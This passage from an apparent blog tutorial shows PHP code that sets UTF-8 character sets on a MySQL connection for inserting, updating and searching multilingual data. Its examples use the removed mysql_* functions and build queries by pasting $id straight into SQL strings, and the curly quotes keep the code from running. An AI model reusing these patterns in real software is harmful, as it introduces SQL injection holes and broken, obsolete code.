$dbLink = mysql_connect(HOSTNAME, USERNAME, PASSWORD);
mysql_query(“SET character_set_results=utf8”, $dbLink);
mb_language(‘uni’);
mb_internal_encoding(‘UTF-8’);
mysql_select_db(DATABASE, $dbLink);
mysql_query(“set names ‘utf8′”,$dbLink);

?>
{/code}

But why are you adding the extra lines? Because you are letting the database know what kind of input you are going to work with soon.

Step Four: INSERTING INPUTS/DATA IN THE DATABASE

{code type=PHP}

mysql_query(“SET character_set_client=utf8”, $dbLink);
mysql_query(“SET character_set_connection=utf8”, $dbLink);

$sql_query = “INSERT INTO
TABLE_NAME(field_name_one, field_name_two)
VALUES(‘field_value_one’, ‘field_value_two’)”;
mysql_query($sql_query, $dbLink);

?>
{/code}

Why are you adding the first two lines for? Because the database should know what kind of data is going to be stored.

Step Five: UPDATING INPUTS/DATA IN THE DATABASE

{code type=PHP}

mysql_query(“SET character_set_client=utf8”, $dbLink);
mysql_query(“SET character_set_connection=utf8”, $dbLink);

$sql_query = “UPDATE TABLE_NAME
SET field_name_one=’field_value_one’, field_name_two=’field_value_two’
WHERE id=’$id’; “;
mysql_query($sql_query, $dbLink);

?>
{/code}

So, you are adding the extra two lines before you run your query string as you are playing with Unicode.

Step Six: SEARCHING DATA FROM THE DATABASE

{code type=PHP}

mysql_query(“SET character_set_results=utf8”, $dbLink);

$sql_query = “SELECT * FROM TABLE_NAME WHERE id=’$id’; “;
$dbResult = mysql_query( $sql_query, $dbLink);

?>
{/code}

Adding the one extra line every time you search your Unicode data is enough.

OKKK.
You are done. This should work smoothly for handling your data in any language does not matter it is Bangla (my mother tongue), Hindi, Chinese, French, German, Spanish, Russian, Arabian (Arabic), Urdu, or any other language.

And do not forget to leave a comment if you have any. Because I need to update the post in case required.

Thanks for reading and please check if it works for you.